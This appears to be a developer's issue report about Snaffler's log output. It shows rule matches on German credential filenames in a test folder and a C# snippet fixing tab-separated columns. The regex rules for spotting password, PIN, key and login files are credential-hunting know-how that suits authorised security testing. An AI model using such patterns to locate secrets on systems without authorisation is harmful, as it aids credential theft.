[host] 2021-08-16 13:13:32Z [File] Red KeepGermanFilenameRegexRed R W Anmeld(edaten|ung) 0 2021-08-16 08:53:21Z C:\Users\user\Desktop\Dev\Snaffler\scanme\german-config\anmeldedaten.txt anmeldedaten.txt
[host] 2021-08-16 13:13:32Z [File] Red KeepGermanFilenameRegexRed R W (Kenn|Pass)w[oö]rte?r? 0 2021-08-16 08:53:21Z C:\Users\user\Desktop\Dev\Snaffler\scanme\german-config\Kennwörter.txt Kennwörter.txt
[host] 2021-08-16 13:13:32Z [File] Red KeepGermanFilenameRegexRed R W Logindaten 0 2021-08-16 08:53:21Z C:\Users\user\Desktop\Dev\Snaffler\scanme\german-config\logindaten.txt logindaten.txt
[host] 2021-08-16 13:13:32Z [File] Red KeepGermanFilenameRegexRed R W Logindaten 0 2021-08-16 10:50:21Z C:\Users\user\Desktop\Dev\Snaffler\scanme\german-config\logindaten.imagine logindaten.imagine
[host] 2021-08-16 13:13:32Z [File] Green KeepNameContainsGreen R W passw 0 2021-08-16 08:53:21Z C:\Users\user\Desktop\Dev\Snaffler\scanme\german-config\passwort.txt passwort.txt
[host] 2021-08-16 13:13:32Z [File] Red KeepGermanFilenameRegexRed R W Kont(o|en) 0 2021-08-16 08:53:21Z C:\Users\user\Desktop\Dev\Snaffler\scanme\german-config\konten.txt konten.txt
[host] 2021-08-16 13:13:32Z [File] Red KeepGermanFilenameRegexRed R W Schlüssel 0 2021-08-16 08:53:21Z C:\Users\user\Desktop\Dev\Snaffler\scanme\german-config\Schlüssel.txt Schlüssel.txt
[host]	2021-08-16	13:07:19Z	[File]	Green	KeepNameContainsGreen	R	W	passw	0	2021-08-16	08:53:21Z	C:\Users\user\Desktop\Dev\Snaffler\scanme\german-config\passwort.txt	passwort.txt
[host]	2021-08-16	13:07:19Z	[File]	Red	KeepGermanFilenameRegexRed	R	W	Logindaten	0	2021-08-16	10:50:21Z	C:\Users\user\Desktop\Dev\Snaffler\scanme\german-config\logindaten.imagine	logindaten.imagine
[host]	2021-08-16	13:07:19Z	[File]	Red	KeepConfigRegexRed	R	W	simple-bind	authenticated	encrypt	33	2021-08-16	10:43:52Z	C:\Users\user\Desktop\Dev\Snaffler\scanme\german-config\bla.toml	simple-bind	authenticated	encrypt
[host]	2021-08-16	13:13:32Z	[File]	Red	KeepGermanFilenameRegexRed	R	W	Anmeld(edaten|ung)	0	2021-08-16	08:53:21Z	C:\Users\user\Desktop\Dev\Snaffler\scanme\german-config\anmeldung.txt	anmeldung.txt
[host]	2021-08-16	13:13:32Z	[File]	Red	KeepGermanFilenameRegexRed	R	W	Anmeld(edaten|ung)	0	2021-08-16	08:53:21Z	C:\Users\user\Desktop\Dev\Snaffler\scanme\german-config\anmeldedaten.txt	anmeldedaten.txt
[host]	2021-08-16	13:13:32Z	[File]	Red	KeepGermanFilenameRegexRed	R	W	(Kenn|Pass)w[oö]rte?r?	0	2021-08-16	08:53:21Z	C:\Users\user\Desktop\Dev\Snaffler\scanme\german-config\Kennwörter.txt	Kennwörter.txt
[host]	2021-08-16	13:13:32Z	[File]	Red	KeepGermanFilenameRegexRed	R	W	Logindaten	0	2021-08-16	08:53:21Z	C:\Users\user\Desktop\Dev\Snaffler\scanme\german-config\logindaten.txt	logindaten.txt
[host]	2021-08-16	13:13:32Z	[File]	Red	KeepGermanFilenameRegexRed	R	W	Logindaten	0	2021-08-16	10:50:21Z	C:\Users\user\Desktop\Dev\Snaffler\scanme\german-config\logindaten.imagine	logindaten.imagine
[host]	2021-08-16	13:13:32Z	[File]	Green	KeepNameContainsGreen	R	W	passw	0	2021-08-16	08:53:21Z	C:\Users\user\Desktop\Dev\Snaffler\scanme\german-config\passwort.txt	passwort.txt
[host]	2021-08-16	13:13:32Z	[File]	Red	KeepGermanFilenameRegexRed	R	W	Kont(o|en)	0	2021-08-16	08:53:21Z	C:\Users\user\Desktop\Dev\Snaffler\scanme\german-config\konten.txt	konten.txt
[host]	2021-08-16	13:13:32Z	[File]	Red	KeepGermanFilenameRegexRed	R	W	Schlüssel	0	2021-08-16	08:53:21Z	C:\Users\user\Desktop\Dev\Snaffler\scanme\german-config\Schlüssel.txt	Schlüssel.txt
[host]	2021-08-16	13:13:32Z	[File]	Red	KeepConfigRegexRed	R	W	simple-bind	authenticated	encrypt	33	2021-08-16	10:43:52Z	C:\Users\user\Desktop\Dev\Snaffler\scanme\german-config\bla.toml	simple-bind	authenticated	encrypt
[host]	2021-08-16	13:13:32Z	[File]	Red	KeepGermanFilenameRegexRed	R	W	(Kenn|Pass)w[oö]rte?r?	0	2021-08-16	08:53:21Z	C:\Users\user\Desktop\Dev\Snaffler\scanme\german-config\passwort.txt	passwort.txt
[host]	2021-08-16	13:13:32Z	[File]	Red	KeepGermanFilenameRegexRed	R	W	PINs?\.	0	2021-08-16	08:53:21Z	C:\Users\user\Desktop\Dev\Snaffler\scanme\german-config\pins.txt	pins.txt
[host]	2021-08-16	13:13:32Z	[File]	Red	KeepGermanFilenameRegexRed	R	W	Zug[aä]ng[es]?	0	2021-08-16	08:53:21Z	C:\Users\user\Desktop\Dev\Snaffler\scanme\german-config\zugangsdaten.txt	zugangsdaten.txt
[host]	2021-08-16	13:13:32Z	[File]	Red	KeepGermanFilenameRegexRed	R	W	T[oü]r[	-]?Code	0	2021-08-16	08:53:21Z	C:\Users\user\Desktop\Dev\Snaffler\scanme\german-config\Torcode.txt	Torcode.txt
[host]	2021-08-16	13:15:12Z	[Info]	Parsing	args...

The latter one can be rainbowed correctly:
[screenshot]

But when I replace all spaces with tabs, it also converts spaces inside filenames and inside regexes to tabs, which then destroys the columns.
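
The underlying problem is that the separators get fixed up after the line has already been rendered; if the still-separate fields were joined with '\t' at render time, spaces inside a field (matched regex, path) would survive. A tiny illustration, using the bla.toml line from above:

using System;

class TsvJoinDemo
{
    static void Main()
    {
        string[] fields =
        {
            "[host]", "2021-08-16 13:07:19Z", "[File]", "Red", "KeepConfigRegexRed",
            "R", "W", "simple-bind authenticated encrypt", "33", "2021-08-16 10:43:52Z",
            @"C:\Users\user\Desktop\Dev\Snaffler\scanme\german-config\bla.toml", "bla.toml",
        };

        // Joining the separate fields with tabs keeps the columns intact even when a
        // field itself contains spaces; a blanket space-to-tab replacement on the
        // finished line cannot tell the two apart.
        string tsv   = string.Join("\t", fields);
        string naive = string.Join(" ", fields).Replace(" ", "\t");

        Console.WriteLine(tsv.Split('\t').Length);     // 12 columns, as intended
        Console.WriteLine(naive.Split('\t').Length);   // 16 columns, broken
    }
}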
